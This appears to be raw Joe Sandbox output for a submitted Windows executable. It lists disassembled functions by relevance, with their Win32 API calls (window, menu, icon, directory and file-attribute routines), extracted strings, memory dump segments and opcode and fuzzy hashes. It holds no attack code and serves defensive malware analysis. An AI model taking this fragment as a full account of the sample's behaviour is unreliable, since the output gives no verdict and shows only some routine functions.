                                                                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                • String ID:
                                                                                                • API String ID: 3869813825-0
                                                                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00464B28
                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                • _wcslen.LIBCMT ref: 00464C28
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                • _wcslen.LIBCMT ref: 00464CBA
                                                                                                • _wcslen.LIBCMT ref: 00464CD0
                                                                                                • _wcslen.LIBCMT ref: 00464CEF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$Directory$CurrentSystem
                                                                                                • String ID: D
                                                                                                • API String ID: 1914653954-2746444292
                                                                                                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1153243558-438819550
                                                                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll
                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                • API String ID: 3832890014-4202584635
                                                                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                • GetFocus.USER32 ref: 0046A0DD
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                • String ID: 0
                                                                                                • API String ID: 1534620443-4108050209
                                                                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateDestroy
                                                                                                • String ID: ,$tooltips_class32
                                                                                                • API String ID: 1109047481-3856767331
                                                                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                • String ID: 0
                                                                                                • API String ID: 1441871840-4108050209
                                                                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                • API String ID: 3631882475-2268648507
                                                                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                • SendMessageW.USER32 ref: 00471740
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                • SendMessageW.USER32 ref: 0047184F
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                • String ID:
                                                                                                • API String ID: 4116747274-0
                                                                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                • _wcslen.LIBCMT ref: 00461683
                                                                                                • __swprintf.LIBCMT ref: 00461721
                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                • GetParent.USER32(?), ref: 004618C3
                                                                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                • String ID: %s%u
                                                                                                • API String ID: 1899580136-679674701
                                                                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu$Sleep
                                                                                                • String ID: 0
                                                                                                • API String ID: 1196289194-4108050209
                                                                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
